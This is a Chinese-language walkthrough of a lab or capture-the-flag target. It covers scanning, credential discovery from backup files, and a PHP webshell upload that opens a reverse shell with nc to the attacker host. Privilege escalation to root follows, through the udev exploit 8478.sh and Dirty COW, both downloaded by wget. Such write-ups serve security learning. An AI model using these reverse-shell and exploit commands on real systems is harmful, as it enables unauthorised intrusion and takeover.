1·主机发现
1-1·netdiscover -i eth0 -r 192.168.164.0/24
2·端口扫描,服务识别
2-1·nmap -A 192.168.164.141
3·路径扫描
3-1·python3 dirsearch.py -u http://192.168.164.141
3-2· /docs下有备份文件,下载。使用Seay进行代码审计。
发现config.ini中存在账号密码,db.sql里面有数据库账号密码
4·漏洞利用
4-1·尝试登录 phpmyadmin/cms_user/45kkald?8laLKD登录成功,好像没啥用。
4-2·尝试数据库登录 index.php/admin/adminpass
点击Add Event
选择文件01.php内容写入
添加事件后到index.php查看源代码,找到files/01.php并点击,发现01.php被执行了,利用木马反弹shell。
4-3·选择02.php
写入&1|nc 192.168.164.128 6666 >/tmp/f;`);?>
kali监听
nc -lvvp 6666
访问/files/02.php成功返回shell
用python模拟一个终端python -c 'import pty;pty.spawn("/bin/bash")'(不使用伪终端可能导致部分命令被限制)。
4-4·提权
首先尝试内核提权
4-4-1·查看系统信息:uname -a
linux 2.6
360搜一下发现存在2.6版本存在udev漏洞
查找脚本:searchsploit linux udev
复制脚本:cp /usr/share/exploitdb/exploits/linux/local/8478.sh /var/www/html
重启apache服务:service apache2 restart
下载脚本:wget http://192.168.164.128/8478.sh
将脚本从文本格式转换为 nuix 格式:dos2unix 8478.sh
添加权限:chmod 777 8478.sh
查看进程:cat /proc/net/netlink
随便用一个进程
./8478.sh 603
whoami
root
4-4-2·使用脏牛提权dirty.c(用exp2,exp1大概率不成功)
下载脚本:wget http://192.168.164.128/dirty.c
添加权限:chmod 777 dirty.c
编译脚本:gcc -pthread dirty.c -o dirty -lcrypt
执行和添加密码:./dirty root
su firefart
还原账号mv /tmp/passwd.bak /etc/passwd
总结
1·信息收集
2·代码审计
3·文件上传
4·系统漏洞提权,脏牛提权。
